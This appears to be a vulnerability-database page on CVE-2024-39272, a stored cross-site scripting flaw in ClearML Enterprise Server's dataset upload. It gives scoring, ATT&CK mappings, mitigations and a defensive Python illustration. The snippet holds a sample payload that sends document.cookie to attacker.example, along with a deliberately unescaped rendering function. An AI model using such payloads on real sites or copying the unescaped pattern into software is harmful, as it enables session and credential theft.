CVE-2024-39272
Published: 06 February 2025
Summary
CVE-2024-39272 is a critical-severity cross-site scripting (CWE-79) vulnerability in ClearML Enterprise Server. Its CVSS base score is 9.0 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Drive-by Compromise (T1189). It ranks in the top 29.1% of CVEs by estimated exploit likelihood and is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2024-39272 is a cross-site scripting (XSS) vulnerability in the dataset upload functionality of ClearML Enterprise Server version 3.22.5-1533. A specially crafted HTTP request can inject arbitrary HTML (and therefore script) that is later rendered in the browsers of users who view the affected content; the attacker triggers the flaw by sending a series of HTTP requests to the affected component.
An attacker with low privileges (PR:L), typically an authenticated account that can use the dataset upload feature, can exploit this vulnerability over the network (AV:N) with low complexity (AC:L), though it requires user interaction (UI:R): a victim must load the page that renders the injected content. Successful exploitation changes scope (S:C), because the payload executes in the victim's browser rather than in the server component that accepted it, and the vector rates high impacts on confidentiality, integrity, and availability (C:H/I:H/A:H), reflecting what script running with the victim's session can do inside the application.
The primary advisory is detailed in the Talos Intelligence vulnerability report TALOS-2024-2110, available at https://talosintelligence.com/vulnerability_reports/TALOS-2024-2110.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2024-53884
Vulnerability details
A cross-site scripting (XSS) vulnerability exists in the dataset upload functionality of ClearML Enterprise Server 3.22.5-1533. A specially crafted HTTP request can lead to arbitrary HTML code. An attacker can send a series of HTTP requests to trigger this vulnerability.
- CWE(s): CWE-79 (Cross-site Scripting)
Related Threats
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The XSS flaw in dataset upload lets a low-privileged attacker inject HTML/JavaScript that executes in the browser of any user who later views the affected dataset. Because the malicious content is served from the legitimate ClearML server, this maps to Drive-by Compromise (T1189) and Exploit Public-Facing Application (T1190). Script running in the victim's origin can read session cookies that are not flagged HttpOnly (T1539) and any credentials the web UI keeps in localStorage, such as cloud storage secrets (T1555.003).
Affected Assets
ClearML Enterprise Server 3.22.5-1533
Mitigating Controls (NIST 800-53 r5)
- SI-10 (Information Input Validation): validates and sanitizes the fields of specially crafted HTTP requests to the dataset upload functionality, rejecting markup before it is stored.
- SI-15 (Information Output Filtering): encodes dataset-derived values for the HTML context in which they are rendered, so injected HTML/JS is displayed as text rather than executed in users' browsers.
- SI-2 (Flaw Remediation): identifies, reports, and corrects the specific XSS flaw in the ClearML Enterprise Server 3.22.5-1533 dataset upload feature by applying the vendor's fix.
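The two controls above, input validation (SI-10) and output encoding (SI-15), shown side by side on a dataset name field. This is an added illustration written for this page, not ClearML's code, and it makes no claim about where the real flaw sits in the 3.22.5-1533 code base; the field name, the allow-list pattern and the sample payload are all constructed for the example.

```python
"""Hypothetical dataset-upload field handling: the vulnerable rendering next to
its hardened form, plus an allow-list check applied before storage.
Not ClearML's implementation; written as an illustration for this page."""
import html
import re

# Constructed sample inputs. The payload is a generic stored-XSS probe, not a
# payload taken from the advisory.
BENIGN_NAME = "imagenet-subset_v2.1"
MALICIOUS_NAME = (
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'
)

# SI-10: allow-list for dataset names (letters, digits, space, dot, underscore,
# hyphen; 1-128 characters). Angle brackets, quotes and ampersands never pass,
# so markup cannot reach the database in the first place.
NAME_PATTERN = re.compile(r"^[A-Za-z0-9][A-Za-z0-9 ._-]{0,127}$")


def validate_dataset_name(name: str) -> bool:
    """Return True only if the name matches the allow-list (the upload handler
    would reject the request with a 400 otherwise)."""
    return NAME_PATTERN.fullmatch(name) is not None


def render_vulnerable(name: str) -> str:
    """Interpolates the stored value straight into markup. Whatever the uploader
    supplied becomes part of the page every viewer loads: stored XSS."""
    return f'<h2 class="dataset-title">{name}</h2>'


def render_hardened(name: str) -> str:
    """SI-15: encode for an HTML text/attribute context. <, >, &, " and ' become
    entities, so the browser shows the payload as text instead of parsing it.
    Note: html.escape is only correct for HTML text and quoted-attribute
    contexts; a value placed inside a <script> block or a URL needs the encoder
    for that context instead."""
    return f'<h2 class="dataset-title">{html.escape(name, quote=True)}</h2>'


def payload_survives(rendered: str, payload: str) -> bool:
    """Cheap regression check: did the raw payload make it into the page?"""
    return payload in rendered


if __name__ == "__main__":
    for name in (BENIGN_NAME, MALICIOUS_NAME):
        print(f"accepted by SI-10 check: {validate_dataset_name(name)}")
        print(f"  vulnerable: {render_vulnerable(name)}")
        print(f"  hardened:   {render_hardened(name)}")
```

Both layers are wanted: the allow-list stops the payload at the upload API, and the encoder protects any path (older records, other upload clients, fields with a looser validation rule) that the allow-list does not cover. Neither layer replaces the vendor fix, and a session cookie set with the HttpOnly flag additionally keeps `document.cookie` out of reach of a payload that does get through.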